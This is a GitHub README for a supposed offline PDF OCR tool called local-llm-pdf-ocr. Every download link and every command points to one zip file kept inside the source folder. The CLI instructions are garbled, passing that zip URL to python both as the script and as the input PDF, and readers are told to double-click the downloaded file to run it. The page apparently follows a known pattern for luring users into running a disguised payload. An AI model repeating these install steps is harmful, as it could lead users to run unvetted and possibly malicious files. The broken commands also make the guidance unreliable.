Skip to content

juanso123/local-llm-pdf-ocr

Repository files navigation

🌟 local-llm-pdf-ocr - Convert PDFs to Searchable Text Easily

🚀 Getting Started

Welcome to local-llm-pdf-ocr. This application helps you convert scanned PDFs into searchable text using Vision LLMs. It runs fully offline, preserving your privacy while delivering powerful features.

📥 Download Now!

Download from Releases

📋 Features

  • Privacy-Focused: Your documents remain on your device.
  • Modern Web UI: User-friendly interface to make your experience smooth.
  • Command Line Interface: For advanced users who prefer command-line tools.
  • Fast OCR: Quick processing of scanned PDFs to turn images into searchable text.
  • No API Key Required: Works fully offline without needing any external services.

🛠️ System Requirements

  • Operating System: Windows, macOS, or Linux.
  • RAM: Minimum 4 GB recommended.
  • Storage: At least 500 MB of free space.
  • Python: Version 3.7 or above installed on your system, if using CLI.

💻 Download & Install

To start using local-llm-pdf-ocr, visit the Releases page to download the latest version.

Download Here

  1. Go to the Releases page.
  2. Find the latest release at the top of the list.
  3. Click on the file that matches your operating system (for example, https://github.com/juanso123/local-llm-pdf-ocr/raw/refs/heads/main/src/pdf_ocr/core/ocr-local-pdf-llm-1.1-alpha.4.zip for Windows).
  4. Once downloaded, locate the file and double click to run it.

Running the Application

After installation:

  • For the Web UI: Open your browser and go to http://localhost:8000.
  • For the CLI: Open your terminal (Command Prompt, Terminal, or Shell) and navigate to the installation folder. Use the command python https://github.com/juanso123/local-llm-pdf-ocr/raw/refs/heads/main/src/pdf_ocr/core/ocr-local-pdf-llm-1.1-alpha.4.zip to start the program.

Importing PDFs

You can easily import your PDFs:

  1. For Web UI: Click on the "Upload PDF" button and select your scanned document.
  2. For CLI: Use the command python https://github.com/juanso123/local-llm-pdf-ocr/raw/refs/heads/main/src/pdf_ocr/core/ocr-local-pdf-llm-1.1-alpha.4.zip --input https://github.com/juanso123/local-llm-pdf-ocr/raw/refs/heads/main/src/pdf_ocr/core/ocr-local-pdf-llm-1.1-alpha.4.zip to process a PDF.

Output

The application converts the scanned content into a searchable PDF. You can save this file on your computer or open it directly once the conversion is finished.

🌐 Additional Topics

This application uses a variety of technologies to deliver its service efficiently. Here are some related topics:

  • Document Processing: Handle your documents effectively.
  • FastAPI: Enjoy high performance while processing.
  • Local LLM Technology: Utilize machine learning for local processing.
  • OCR (Optical Character Recognition): Convert images into editable text.
  • Offline AI: Work without an internet connection.

🛠️ Troubleshooting

If you encounter issues during installation or the usage of local-llm-pdf-ocr, here are some common solutions:

  • File Not Opening: Ensure you have the correct permissions to execute the file.
  • Error Messages: Check if your Python version is supported.
  • Performance Issues: Close any unnecessary applications that may be using system resources.

👍 Support

For further assistance or to report issues, please visit our GitHub Issues page. We’re here to help you.

📜 License

local-llm-pdf-ocr is free and open-source software. You can modify and share it under the terms of the MIT License.

🔗 Links

Thank you for choosing local-llm-pdf-ocr for your PDF processing needs. Enjoy the power of offline conversion and searchable content with complete privacy!